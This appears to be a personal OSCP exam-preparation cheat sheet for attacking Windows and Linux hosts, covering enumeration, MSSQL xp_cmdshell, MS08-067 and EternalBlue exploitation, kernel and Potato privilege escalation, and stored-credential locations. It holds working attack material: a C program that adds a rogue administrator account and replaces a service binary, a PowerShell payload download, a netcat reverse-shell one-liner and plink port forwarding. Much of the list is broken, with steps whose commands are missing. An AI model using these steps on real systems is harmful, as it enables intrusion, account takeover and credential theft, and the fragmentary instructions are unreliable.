My OSCP Methodology
- service -> exploit (searchsploit + google)
- banner
- default creds (hydra)
- Anonymous login
- Put files
- if exists web service, check if web and ftp has the same path
 
- nmap info
- service -> exploit (searchsploit + google)
- banner
- default creds (hydra)
- default creds with nsr (hydra)
- nmap info
- 
nmap info: - OS samba
- Computer name/NetBIOS name
- Domain name
- Workgroup
- OS of machine
 
- 
service (OS samba or nmap service header (139 & 445)) -> exploit (searchsploit + google) 
- 
enum4linux 
- 
smbclient *smbclient -L -N - connect to samba in a specific share with creds
- smbclient \\ip\share -U username
 
 
- connect to samba in a specific share with creds
- 
Connect to MSSQL: 
- 
Enable xp_cmdshell: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install. (return status = 0) Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. (return status = 0) 
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=<pass>,ms-sql-xp-cmdshell.cmd="net user " <ip>
- 
Service -> exploit (searchsploit + google) 
- 
nmap info 
- 
if directories from nmap output, OPTIONS request for put http method availability. 
- 
nikto: - default
- CGI all
 
- 
source 
- 
gobuster: - 
with common.txt: 
- 
With big.txt: 
- 
With medium.txt: 
 
- 
- 
Play around with burpsuite (Spider, repeater) 
- 
if web page contains big articles qith many words use cewl: 
- Windows Server 2003 and IIS 6.0 privledge escalation using impersonation token (Tokens kiddnapping revenge):
- use https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
- Needs Listener
git clone https://github.com/andyacer/ms08_067.git
- configuration
- pip install impacket
 
- 2 reverse options for shellcoding:
- Use the third with 443
- Use the third with default
- Use second with default
- Use second with port of third or another port
 
- Choose the right option of menu.
- Find OS of machine
- Guess lanhuage
 
- Needs Listener
git clone https://github.com/worawit/MS17-010.git
- 
If needed USERNAME-"//" 
- 
next add the following 2 lines to below def smb smb_send_file(smbConn, '/root/htb/blue/puckieshell443.exe', 'C', '/puckieshell443.exe') service_exec(conn, r'cmd /c c:\puckieshell443.exe') 
- 
custom payload: 
- 
Needs Listener 
- use the https://github.com/nickvourd/eternalblue_win7_auto_gen in order to merge binaries nad payload
- Run the following: python MS17-010/eternalblue_exploit7.py /tmp/sc_x.bin
- Needs Listener
- use the https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059
- serve the MS10-059.exe (https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS10-059/MS10-059.exe) to victim
- run exploit:
- Need Listener
- 
compile: 
- 
no need listener (insta run) 
- use the https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip
- Check the architecture of victim and choose the right exe
- upload to victim machine
- run the following:
- Needs Listener
- use https://www.exploit-db.com/exploits/39719
- Edit the file:
- end of file add this Invoke-MS16-032
- Inside th file search and find cmd.exe two times.
- Change with shell.exe in current directory in victim which you are.
- generate shell.exe:
- serve the shell.exe to victim
- open a listener
- run the ps1 exploit:
 
What is: Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing.
Affected systems: Windows 7,8,10, Server 2008, Server 2012
Guide: https://foxglovesecurity.com/2016/01/16/hot-potato/
Use: https://github.com/foxglovesec/Potato
What is: Rotten Potato and its standalone variants leverages the privilege escalation chain based on BITS service having the MiTM listener on 127.0.0.1:6666 and when you have SeImpersonate or SeAssignPrimaryToken privileges
Affetced sytsems: Windows 7,8,10, Server 2008, Server 2012, Server 2016
Guide: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ https://0xdf.gitlab.io/2018/08/04/htb-silo.html
Use: https://github.com/nickvourd/lonelypotato
- Rotten Potato from default opens meterpreter, use lonely potato which opens in line shell
What is: Juicy potato is basically a weaponized version of the RottenPotato exploit that exploits the way Microsoft handles tokens. Through this, we achieve privilege escalation.
Affetcted Systems:
- Windows 7 Enterprise
- Windows 8.1 Enterprise
- Windows 10 Enterprise
- Windows 10 Professional
- Windows Server 2008 R2 Enterprise
- Windows Server 2012 Datacenter
- Windows Server 2016 Standard
Find CLSID here: https://ohpe.it/juicy-potato/CLSID/
Guides: https://0x1.gitlab.io/exploit/Windows-Privilege-Escalation/#juicy-potato-abusing-the-golden-privileges https://hunter2.gitbook.io/darthsidious/privilege-escalation/juicy-potato#:~:text=Juicy%20potato%20is%20basically%20a,this%2C%20we%20achieve%20privilege%20escalation.
Use: https://github.com/ohpe/juicy-potato
- 
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" - searchsploit
 
- 
systeminfo - Architecture
- Numbers of Proccessors
- Domain
- HotFixes
- System Locale
- Input Locale
 
- 
Numbers of cores of processors: 
- 
Windows Privileges: - More info here: https://hackinparis.com/data/slides/2019/talks/HIP2019-Andrea_Pierini-Whoami_Priv_Show_Me_Your_Privileges_And_I_Will_Lead_You_To_System.pdf
- SeDebugPrivilege
- SeRestorePrivilege
- SeBackupPrivilege
- SeTakeOwnershipPrivilege
- SeTcbPrivilege
- SeCreateToken Privilege
- SeLoadDriver Privilege
- SeImpersonate & SeAssignPrimaryToken Priv.
 
 
- More info here: https://hackinparis.com/data/slides/2019/talks/HIP2019-Andrea_Pierini-Whoami_Priv_Show_Me_Your_Privileges_And_I_Will_Lead_You_To_System.pdf
- 
Users of system and their groups - net user
- net user *Password required *groups
 
- 
whoami /groups 
- 
Insecure File Permissions: or with powershell Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}- if full access the User can modify it.
 Custom exploit: #include <stdlib.h> int main (){ int i; i = system ("net user evil Ev!lpass /add"); i = system ("net localgroup administrators evil /add"); retunr 0; } Compile from windows: i686-w64-mingw32-gcc adduser.c -o adduser.exe move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe" move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe" dir "C:\Program Files\Serviio\bin" net stop Servilo if access denied try:wmic service where caption="Serviio" get name, caption, state, startmode -> if Auto atrribute inside then will auto execute after reboot. whoami /priv if SeShutdownPrivilege then we can restart machine: * shutdown /r /t 0 net localgroup Administrators 
- 
Unqoted Service Path: 
- 
Enumerating World Writable Directories: 
- 
Applications installed versions: 
- 
Schedule tasks 
- 
Windows-Exploit-Suggester - python windows-exploit-suggester.py --database 2020-08-09-mssb.xls --systeminfo grandpa.txt
 
- 
Serlock - Config: Add to the last line the "Find-AllVulns"
- Download and run Sherlock:
 
- 
Watson - Find .NET latest version of victim:
- Fow older than windows 10 download zip version of watson v.1: https://github.com/rasta-mouse/Watson/tree/486ff207270e4f4cadc94ddebfce1121ae7b5437
- Build exe to visual studio
 
- 
PowerUP - Config: add to the last line the "Invoke-AllChecks"
- Download and run PowerUp:
 
- 
Stored Creadentials: - 
cmdkey /list - if interactive module enabled 100% runas as other user
- if domain and user exist try again runas as other user
 
- 
Stored as plaintext or base64 - C:\unattend.xml
- C:\Windows\Panther\Unattend.xml
- C:\Windows\Panther\Unattend\Unattend.xml
- C:\Windows\system32\sysprep.inf
- C:\Windows\system32\sysprep\sysprep.xml
 
- 
If system is running an IIS web server the web.config file: - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
- C:\inetpub\wwwroot\web.config
 
- 
Local administrators passwords can also retrieved via the Group Policy Preferences: - C:\ProgramData\Microsoft\Group Policy\History????\Machine\Preferences\Groups\Groups.xml
- \????\SYSVOL\Policies????\MACHINE\Preferences\Groups\Groups.xml
 
- 
Except of the Group.xml file the cpassword attribute can be found in other policy preference files as well such as: - Services\Services.xml
- ScheduledTasks\ScheduledTasks.xml
- Printers\Printers.xml
- Drives\Drives.xml
- DataSources\DataSources.xml
 
- 
Most Windows systems they are running McAfee as their endpoint protection. The password is stored encrypted in the SiteList.xml file: - %AllUsersProfile%Application Data\McAfee\Common Framework\SiteList.xml
 
 
- 
powershell -command "& { iwr http://192.168.199.1/win.txt -OutFile win.txt }"
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
plink
→ What is plink:
Plink is a command-line connection tool similar to UNIX ssh. It is mostly used for automated operations, such as making CVS access a repository on a remote server. Plink is a command line application.It makes simple interactive connection to a remote server. This means that you cannot just double-click on its icon to run it and instead you have to bring up a console window.
Example to expose ports: 445 (samba)
How to expose a port on your local machine:
[local_machine]: systemctl start ssh
→ Upload plink.exe on remote machine as binary (mode)
[remote_machine]: plink.exe -l [username] -pw [password] -R [port]:127.0.0.1:[port] [ip]
→ After that, the victim’s port will be exposed on your local machine (127.0.0.1)